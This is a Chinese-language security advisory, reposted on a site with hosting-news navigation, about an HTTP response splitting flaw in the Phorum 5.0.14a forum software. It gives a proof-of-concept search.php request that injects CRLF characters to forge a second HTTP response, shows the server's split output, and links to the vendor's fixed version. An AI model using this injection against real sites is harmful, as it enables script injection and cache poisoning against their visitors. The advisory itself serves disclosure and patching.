Phorum HTTP响应拆分漏洞
2008-04-09 04:25:11来源:互联网 阅读 ()
发布日期:2005-03-23
更新日期:2005-03-23
受影响系统:
Phorum Phorum 5.0.14a不受影响系统:
Phorum Phorum 5.0.15a描述:
BUGTRAQ ID: 12869
Phorum是一款基于PHP的WEB论坛程序,可在Linux和Unix操作系统下使用,也可在Microsoft Windows操作系统下使用。
由于没能正确的验证传送给Location参数的输入,攻击者可能向HTTP首部中注入恶意的字符。这可能导致在受影响站点的用户浏览器会话中执行任意HTML和脚本代码,进而展开各种攻击,如跨站脚本、破坏Web或浏览器缓存、劫持页面等。
<*来源:Alexander Anisimov (anisimov@ptsecurity.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111151651621097&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://[server]/phorum5/search.php?forum_id=0&search=1&body= Content-Length: 0% \
0d HTTP/1.0 200 OK Content-Type: text/html Content-Length: 3 \
4 <html>Scanned by \
PTsecurity</html> &author=1&subject=1&match_forum=ALL&match_type=ALL&match_dates= \
30
结果:
HTTP/1.1 302 Found
Date: Tue, 01 Mar 2005 12:33:53 GMT
Server: Apache/1.3.31 (Unix) PHP/4.3.10
X-Powered-By: PHP/4.3.10
Location: http://[server]/phorum5/search.php?0,search=1,page=1,match_type=ALL,match_da \
tes=30,match_forum=ALL,body=
Content-Length: 0
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 34
<html>Scanned by PTsecurity</html>
,author=1,subject=1
Connection: close
Content-Type: text/html
<...>
建议:
厂商补丁:
Phorum
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载5.0.15:
http://phorum.org/story.php?48
http://phorum.org/downloads/phorum-5.0.15a.tar.gz
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash